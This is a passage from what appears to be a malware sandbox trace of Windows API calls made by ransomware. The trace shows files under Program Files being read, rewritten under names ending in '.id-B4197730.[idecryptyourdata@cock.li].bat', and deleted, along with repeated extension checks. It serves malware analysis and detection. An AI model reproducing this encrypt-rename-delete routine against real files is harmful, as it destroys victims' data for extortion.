shared\\clicktorun\\servicewatcherschedule.xml")) returned 0x20 [0054.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0054.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0054.556] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0054.556] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0054.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0055.282] GetLastError () returned 0x0 [0055.282] ReadFile (in: hFile=0x2c4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1162, lpOverlapped=0x0) returned 1 [0055.345] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1170, lpOverlapped=0x0) returned 1 [0055.347] ReadFile (in: hFile=0x2c4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0055.347] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x108, lpOverlapped=0x0) returned 1 [0055.347] SetEndOfFile (hFile=0x2c0) returned 1 [0055.347] CloseHandle (hObject=0x2c0) returned 1 [0055.348] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0055.348] SetEndOfFile (hFile=0x2c4) returned 1 [0055.348] CloseHandle (hObject=0x2c4) returned 1 [0055.349] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0055.349] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml")) returned 1 [0055.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.349] lstrlenW (lpString=".doc") returned 4 [0055.349] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.349] lstrlenW (lpString=".docx") returned 5 [0055.349] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.349] lstrlenW (lpString=".pdf") returned 4 [0055.349] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.350] lstrlenW (lpString=".xls") returned 4 [0055.350] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.350] lstrlenW (lpString=".xlsx") returned 5 [0055.350] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.350] lstrlenW (lpString=".ppt") returned 4 [0055.350] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.350] lstrlenW (lpString=".zip") returned 4 [0055.350] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.350] lstrlenW (lpString=".rar") returned 4 [0055.350] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.350] lstrlenW (lpString=".bz2") returned 4 [0055.350] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.350] lstrlenW (lpString=".7z") returned 3 [0055.350] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.350] lstrlenW (lpString=".dbf") returned 4 [0055.350] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.350] lstrlenW (lpString=".1cd") returned 4 [0055.350] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.350] lstrlenW (lpString=".jpg") returned 4 [0055.350] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.350] lstrlenW (lpString=".doc") returned 4 [0055.350] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.351] lstrlenW (lpString=".docx") returned 5 [0055.351] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.351] lstrlenW (lpString=".pdf") returned 4 [0055.351] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.351] lstrlenW (lpString=".xls") returned 4 [0055.351] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.351] lstrlenW (lpString=".xlsx") returned 5 [0055.351] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.351] lstrlenW (lpString=".ppt") returned 4 [0055.351] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.351] lstrlenW (lpString=".zip") returned 4 [0055.351] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.351] lstrlenW (lpString=".rar") returned 4 [0055.351] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.351] lstrlenW (lpString=".bz2") returned 4 [0055.351] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.351] lstrlenW (lpString=".7z") returned 3 [0055.351] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.351] lstrlenW (lpString=".dbf") returned 4 [0055.351] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.351] lstrlenW (lpString=".1cd") returned 4 [0055.351] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0055.351] lstrlenW (lpString=".jpg") returned 4 [0055.351] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.352] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0055.352] lstrlenW (lpString="boxed-split.avi") returned 15 [0055.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0055.367] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=84190) returned 1 [0055.367] CloseHandle (hObject=0x2c0) returned 1 [0055.367] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0055.367] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.367] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.367] lstrlenW (lpString=".doc") returned 4 [0055.367] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.367] lstrlenW (lpString=".docx") returned 5 [0055.367] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0055.367] lstrlenW (lpString=".pdf") returned 4 [0055.367] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.367] lstrlenW (lpString=".xls") returned 4 [0055.367] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.367] lstrlenW (lpString=".xlsx") returned 5 [0055.367] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0055.368] lstrlenW (lpString=".ppt") returned 4 [0055.368] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.368] lstrlenW (lpString=".zip") returned 4 [0055.368] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.368] lstrlenW (lpString=".rar") returned 4 [0055.368] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.368] lstrlenW (lpString=".bz2") returned 4 [0055.368] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.368] lstrlenW (lpString=".7z") returned 3 [0055.368] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.368] lstrlenW (lpString=".dbf") returned 4 [0055.368] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.368] lstrlenW (lpString=".1cd") returned 4 [0055.368] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.368] lstrlenW (lpString=".jpg") returned 4 [0055.368] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.368] lstrlenW (lpString=".doc") returned 4 [0055.368] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.368] lstrlenW (lpString=".docx") returned 5 [0055.368] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0055.368] lstrlenW (lpString=".pdf") returned 4 [0055.369] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.369] lstrlenW (lpString=".xls") returned 4 [0055.369] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.369] lstrlenW (lpString=".xlsx") returned 5 [0055.369] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0055.369] lstrlenW (lpString=".ppt") returned 4 [0055.369] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.369] lstrlenW (lpString=".zip") returned 4 [0055.369] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.369] lstrlenW (lpString=".rar") returned 4 [0055.369] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.369] lstrlenW (lpString=".bz2") returned 4 [0055.369] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.369] lstrlenW (lpString=".7z") returned 3 [0055.369] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.369] lstrlenW (lpString=".dbf") returned 4 [0055.369] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.369] lstrlenW (lpString=".1cd") returned 4 [0055.369] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0055.369] lstrlenW (lpString=".jpg") returned 4 [0055.369] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.370] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0055.370] lstrlenW (lpString="delete.avi") returned 10 [0055.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0055.370] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=208408) returned 1 [0055.370] CloseHandle (hObject=0x2c0) returned 1 [0055.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0055.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.371] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.371] lstrlenW (lpString=".doc") returned 4 [0055.371] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.371] lstrlenW (lpString=".docx") returned 5 [0055.371] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0055.371] lstrlenW (lpString=".pdf") returned 4 [0055.371] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.371] lstrlenW (lpString=".xls") returned 4 [0055.371] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.371] lstrlenW (lpString=".xlsx") returned 5 [0055.371] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0055.371] lstrlenW (lpString=".ppt") returned 4 [0055.371] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.371] lstrlenW (lpString=".zip") returned 4 [0055.371] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.371] lstrlenW (lpString=".rar") returned 4 [0055.371] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.371] lstrlenW (lpString=".bz2") returned 4 [0055.371] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.371] lstrlenW (lpString=".7z") returned 3 [0055.371] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.371] lstrlenW (lpString=".dbf") returned 4 [0055.371] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.372] lstrlenW (lpString=".1cd") returned 4 [0055.372] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.372] lstrlenW (lpString=".jpg") returned 4 [0055.372] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.372] lstrlenW (lpString=".doc") returned 4 [0055.372] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.375] lstrlenW (lpString=".docx") returned 5 [0055.375] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0055.375] lstrlenW (lpString=".pdf") returned 4 [0055.375] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.375] lstrlenW (lpString=".xls") returned 4 [0055.375] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.375] lstrlenW (lpString=".xlsx") returned 5 [0055.375] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0055.375] lstrlenW (lpString=".ppt") returned 4 [0055.375] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.375] lstrlenW (lpString=".zip") returned 4 [0055.375] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.375] lstrlenW (lpString=".rar") returned 4 [0055.375] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.375] lstrlenW (lpString=".bz2") returned 4 [0055.375] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.375] lstrlenW (lpString=".7z") returned 3 [0055.375] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.375] lstrlenW (lpString=".dbf") returned 4 [0055.375] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.375] lstrlenW (lpString=".1cd") returned 4 [0055.375] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0055.375] lstrlenW (lpString=".jpg") returned 4 [0055.376] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.376] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0055.376] lstrlenW (lpString="join.avi") returned 8 [0055.376] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0055.379] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=199994) returned 1 [0055.379] CloseHandle (hObject=0x2c0) returned 1 [0055.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0055.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.379] lstrlenW (lpString=".doc") returned 4 [0055.379] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.379] lstrlenW (lpString=".docx") returned 5 [0055.379] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0055.379] lstrlenW (lpString=".pdf") returned 4 [0055.380] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.380] lstrlenW (lpString=".xls") returned 4 [0055.380] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.380] lstrlenW (lpString=".xlsx") returned 5 [0055.380] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0055.380] lstrlenW (lpString=".ppt") returned 4 [0055.380] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.380] lstrlenW (lpString=".zip") returned 4 [0055.380] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.380] lstrlenW (lpString=".rar") returned 4 [0055.380] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.380] lstrlenW (lpString=".bz2") returned 4 [0055.380] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.380] lstrlenW (lpString=".7z") returned 3 [0055.380] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.380] lstrlenW (lpString=".dbf") returned 4 [0055.380] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.380] lstrlenW (lpString=".1cd") returned 4 [0055.380] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.381] lstrlenW (lpString=".jpg") returned 4 [0055.381] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.381] lstrlenW (lpString=".doc") returned 4 [0055.381] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.381] lstrlenW (lpString=".docx") returned 5 [0055.381] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0055.381] lstrlenW (lpString=".pdf") returned 4 [0055.381] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.381] lstrlenW (lpString=".xls") returned 4 [0055.381] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.381] lstrlenW (lpString=".xlsx") returned 5 [0055.381] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0055.381] lstrlenW (lpString=".ppt") returned 4 [0055.381] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.381] lstrlenW (lpString=".zip") returned 4 [0055.381] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.381] lstrlenW (lpString=".rar") returned 4 [0055.381] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.381] lstrlenW (lpString=".bz2") returned 4 [0055.381] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.381] lstrlenW (lpString=".7z") returned 3 [0055.381] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.381] lstrlenW (lpString=".dbf") returned 4 [0055.381] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.382] lstrlenW (lpString=".1cd") returned 4 [0055.382] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.382] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0055.382] lstrlenW (lpString=".jpg") returned 4 [0055.382] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.382] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0055.382] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0055.382] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0055.588] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=1600388) returned 1 [0055.588] CloseHandle (hObject=0x2c4) returned 1 [0055.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0055.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.589] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: 